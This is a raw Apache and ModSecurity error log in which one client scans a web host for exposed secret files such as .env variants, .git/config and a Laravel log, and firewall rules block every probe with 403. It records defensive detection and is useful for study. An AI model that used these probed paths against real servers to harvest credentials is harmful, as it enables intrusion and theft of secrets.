[Mon May 11 17:38:57.601506 2026] [:error] [pid 1412074:tid 1412091] [client 88.151.34.35:59754] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:38:58.345052 2026] [:error] [pid 1412074:tid 1412079] [client 88.151.34.35:34296] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:38:58.346346 2026] [:error] [pid 1411099:tid 1411115] [client 88.151.34.35:34282] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:38:58.349794 2026] [:error] [pid 1411055:tid 1411060] [client 88.151.34.35:34262] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:38:59.155078 2026] [:error] [pid 1412074:tid 1412079] [client 88.151.34.35:34296] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:39:00.715627 2026] [:error] [pid 1412074:tid 1412079] [client 88.151.34.35:34296] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:39:00.858296 2026] [:error] [pid 1412074:tid 1412079] [client 88.151.34.35:34296] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:39:03.355670 2026] [:error] [pid 1412074:tid 1412079] [client 88.151.34.35:34296] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:39:03.536247 2026] [:error] [pid 1412074:tid 1412079] [client 88.151.34.35:34296] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:39:04.479123 2026] [:error] [pid 1412074:tid 1412079] [client 88.151.34.35:34296] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:39:04.859641 2026] [:error] [pid 1412074:tid 1412079] [client 88.151.34.35:34296] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:39:06.285627 2026] [:error] [pid 1412074:tid 1412079] [client 88.151.34.35:34296] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:39:06.544643 2026] [:error] [pid 1412074:tid 1412079] [client 88.151.34.35:34296] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:39:07.163315 2026] [:error] [pid 1412074:tid 1412079] [client 88.151.34.35:34296] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:39:07.450482 2026] [:error] [pid 1412074:tid 1412079] [client 88.151.34.35:34296] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:39:08.302775 2026] [:error] [pid 1412074:tid 1412079] [client 88.151.34.35:34296] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:39:10.842227 2026] [:error] [pid 1412074:tid 1412079] [client 88.151.34.35:34296] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:39:11.125803 2026] [:error] [pid 1412074:tid 1412079] [client 88.151.34.35:34296] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:39:11.773642 2026] [:error] [pid 1412074:tid 1412079] [client 88.151.34.35:34296] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:39:14.294485 2026] [:error] [pid 1412074:tid 1412079] [client 88.151.34.35:34296] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:39:16.322045 2026] [:error] [pid 1412074:tid 1412079] [client 88.151.34.35:34296] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:39:16.687108 2026] [:error] [pid 1412074:tid 1412079] [client 88.151.34.35:34296] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:39:17.560765 2026] [security2:error] [pid 1411201:tid 1411264] [client 88.151.34.35:43634] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ns1.webshop.totalcloud.fr"] [uri "/api/.env"] [unique_id "agH4Jfy_GXSWIKeli0sO1gAAAJI"]
[Mon May 11 17:39:17.561010 2026] [security2:error] [pid 1411201:tid 1411264] [client 88.151.34.35:43634] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ns1.webshop.totalcloud.fr"] [uri "/api/.env"] [unique_id "agH4Jfy_GXSWIKeli0sO1gAAAJI"]
[Mon May 11 17:39:17.626692 2026] [:error] [pid 1412074:tid 1412079] [client 88.151.34.35:34296] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:39:17.845868 2026] [security2:error] [pid 1411201:tid 1411258] [client 88.151.34.35:43642] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ns1.webshop.totalcloud.fr"] [uri "/admin/.env"] [unique_id "agH4Jfy_GXSWIKeli0sO0wAAAIw"]
[Mon May 11 17:39:17.846344 2026] [security2:error] [pid 1411201:tid 1411258] [client 88.151.34.35:43642] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ns1.webshop.totalcloud.fr"] [uri "/admin/.env"] [unique_id "agH4Jfy_GXSWIKeli0sO0wAAAIw"]
[Mon May 11 17:39:18.033828 2026] [:error] [pid 1416109:tid 1416151] [client 88.151.34.35:43694] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:39:18.034393 2026] [:error] [pid 1412074:tid 1412093] [client 88.151.34.35:43690] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:39:18.034435 2026] [security2:error] [pid 1411099:tid 1411102] [client 88.151.34.35:43736] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ns1.webshop.totalcloud.fr"] [uri "/.env.example"] [unique_id "agH4Jg-Qm4vhlWBPlMjTuQAAAAE"]
[Mon May 11 17:39:18.034588 2026] [security2:error] [pid 1411099:tid 1411102] [client 88.151.34.35:43736] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ns1.webshop.totalcloud.fr"] [uri "/.env.example"] [unique_id "agH4Jg-Qm4vhlWBPlMjTuQAAAAE"]
[Mon May 11 17:39:18.035192 2026] [security2:error] [pid 1411055:tid 1411076] [client 88.151.34.35:43612] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ns1.webshop.totalcloud.fr"] [uri "/.env.test"] [unique_id "agH4JkWKUxpmnkK7zHyXogAAARM"]
[Mon May 11 17:39:18.035407 2026] [security2:error] [pid 1411055:tid 1411076] [client 88.151.34.35:43612] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ns1.webshop.totalcloud.fr"] [uri "/.env.test"] [unique_id "agH4JkWKUxpmnkK7zHyXogAAARM"]
[Mon May 11 17:39:18.036305 2026] [security2:error] [pid 1411055:tid 1411076] [client 88.151.34.35:43612] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ns1.webshop.totalcloud.fr"] [uri "/403.shtml"] [unique_id "agH4JkWKUxpmnkK7zHyXogAAARM"]
[Mon May 11 17:39:18.042347 2026] [:error] [pid 1411099:tid 1411111] [client 88.151.34.35:43678] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:39:18.045044 2026] [security2:error] [pid 1412074:tid 1412088] [client 88.151.34.35:43568] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ns1.webshop.totalcloud.fr"] [uri "/.env.backup"] [unique_id "agH4JjJnyuKVXoStDhbPZQAAAEw"]
[Mon May 11 17:39:18.045619 2026] [security2:error] [pid 1411055:tid 1411062] [client 88.151.34.35:43564] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ns1.webshop.totalcloud.fr"] [uri "/.env.development"] [unique_id "agH4JkWKUxpmnkK7zHyXpAAAAQU"]
[Mon May 11 17:39:18.045782 2026] [security2:error] [pid 1411055:tid 1411062] [client 88.151.34.35:43564] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ns1.webshop.totalcloud.fr"] [uri "/.env.development"] [unique_id "agH4JkWKUxpmnkK7zHyXpAAAAQU"]
[Mon May 11 17:39:18.093221 2026] [security2:error] [pid 1412074:tid 1412079] [client 88.151.34.35:34296] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ns1.webshop.totalcloud.fr"] [uri "/.env"] [unique_id "agH4JjJnyuKVXoStDhbPaAAAAEM"]
[Mon May 11 17:39:18.093432 2026] [security2:error] [pid 1412074:tid 1412079] [client 88.151.34.35:34296] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ns1.webshop.totalcloud.fr"] [uri "/.env"] [unique_id "agH4JjJnyuKVXoStDhbPaAAAAEM"]
[Mon May 11 17:39:18.184057 2026] [:error] [pid 1416109:tid 1416147] [client 88.151.34.35:43628] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:39:18.196927 2026] [:error] [pid 1411201:tid 1411256] [client 88.151.34.35:43726] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:39:18.198223 2026] [security2:error] [pid 1412074:tid 1412085] [client 88.151.34.35:43646] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ns1.webshop.totalcloud.fr"] [uri "/backend/.env"] [unique_id "agH4JjJnyuKVXoStDhbPZAAAAEk"]
[Mon May 11 17:39:18.198275 2026] [security2:error] [pid 1411055:tid 1411062] [client 88.151.34.35:43564] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ns1.webshop.totalcloud.fr"] [uri "/403.shtml"] [unique_id "agH4JkWKUxpmnkK7zHyXpAAAAQU"]
[Mon May 11 17:39:18.199216 2026] [:error] [pid 1411099:tid 1411116] [client 88.151.34.35:43522] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:39:18.199237 2026] [security2:error] [pid 1411055:tid 1411066] [client 88.151.34.35:43584] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ns1.webshop.totalcloud.fr"] [uri "/.env.bak"] [unique_id "agH4JkWKUxpmnkK7zHyXpQAAAQk"]
[Mon May 11 17:39:18.205454 2026] [security2:error] [pid 1411055:tid 1411066] [client 88.151.34.35:43584] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ns1.webshop.totalcloud.fr"] [uri "/.env.bak"] [unique_id "agH4JkWKUxpmnkK7zHyXpQAAAQk"]
[Mon May 11 17:39:18.205592 2026] [:error] [pid 1411099:tid 1411109] [client 88.151.34.35:43710] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:39:18.210532 2026] [security2:error] [pid 1416109:tid 1416136] [client 88.151.34.35:43594] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ns1.webshop.totalcloud.fr"] [uri "/.env.old"] [unique_id "agH4JlV4kyjgo4bQBUhvrwAAAMY"]
[Mon May 11 17:39:18.210696 2026] [security2:error] [pid 1416109:tid 1416136] [client 88.151.34.35:43594] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ns1.webshop.totalcloud.fr"] [uri "/.env.old"] [unique_id "agH4JlV4kyjgo4bQBUhvrwAAAMY"]
[Mon May 11 17:39:18.216279 2026] [security2:error] [pid 1412074:tid 1412085] [client 88.151.34.35:43646] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ns1.webshop.totalcloud.fr"] [uri "/backend/.env"] [unique_id "agH4JjJnyuKVXoStDhbPZAAAAEk"]
[Mon May 11 17:39:18.224560 2026] [security2:error] [pid 1416109:tid 1416136] [client 88.151.34.35:43594] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ns1.webshop.totalcloud.fr"] [uri "/403.shtml"] [unique_id "agH4JlV4kyjgo4bQBUhvrwAAAMY"]
[Mon May 11 17:39:18.235071 2026] [security2:error] [pid 1416109:tid 1416132] [client 88.151.34.35:43484] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ns1.webshop.totalcloud.fr"] [uri "/.git/config"] [unique_id "agH4JlV4kyjgo4bQBUhvswAAAMI"]
[Mon May 11 17:39:18.235291 2026] [security2:error] [pid 1416109:tid 1416132] [client 88.151.34.35:43484] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ns1.webshop.totalcloud.fr"] [uri "/.git/config"] [unique_id "agH4JlV4kyjgo4bQBUhvswAAAMI"]
[Mon May 11 17:39:18.241845 2026] [security2:error] [pid 1411099:tid 1411117] [client 88.151.34.35:43546] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ns1.webshop.totalcloud.fr"] [uri "/.env.production"] [unique_id "agH4Jg-Qm4vhlWBPlMjTuwAAABE"]
[Mon May 11 17:39:18.242042 2026] [security2:error] [pid 1411099:tid 1411117] [client 88.151.34.35:43546] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ns1.webshop.totalcloud.fr"] [uri "/.env.production"] [unique_id "agH4Jg-Qm4vhlWBPlMjTuwAAABE"]
[Mon May 11 17:39:18.242881 2026] [security2:error] [pid 1412074:tid 1412085] [client 88.151.34.35:43646] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ns1.webshop.totalcloud.fr"] [uri "/403.shtml"] [unique_id "agH4JjJnyuKVXoStDhbPZAAAAEk"]
[Mon May 11 17:39:18.243766 2026] [security2:error] [pid 1416109:tid 1416132] [client 88.151.34.35:43484] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ns1.webshop.totalcloud.fr"] [uri "/403.shtml"] [unique_id "agH4JlV4kyjgo4bQBUhvswAAAMI"]
[Mon May 11 17:39:18.353526 2026] [security2:error] [pid 1411201:tid 1411424] [client 88.151.34.35:43508] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "ns1.webshop.totalcloud.fr"] [uri "/storage/logs/laravel.log"] [unique_id "agH4Jfy_GXSWIKeli0sO0gAAAJM"]
[Mon May 11 17:39:18.354110 2026] [security2:error] [pid 1411201:tid 1411424] [client 88.151.34.35:43508] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ns1.webshop.totalcloud.fr"] [uri "/storage/logs/laravel.log"] [unique_id "agH4Jfy_GXSWIKeli0sO0gAAAJM"]
[Mon May 11 17:39:18.354789 2026] [:error] [pid 1411201:tid 1411268] [client 88.151.34.35:43728] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:39:18.364744 2026] [security2:error] [pid 1411201:tid 1411424] [client 88.151.34.35:43508] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "ns1.webshop.totalcloud.fr"] [uri "/403.shtml"] [unique_id "agH4Jfy_GXSWIKeli0sO0gAAAJM"]
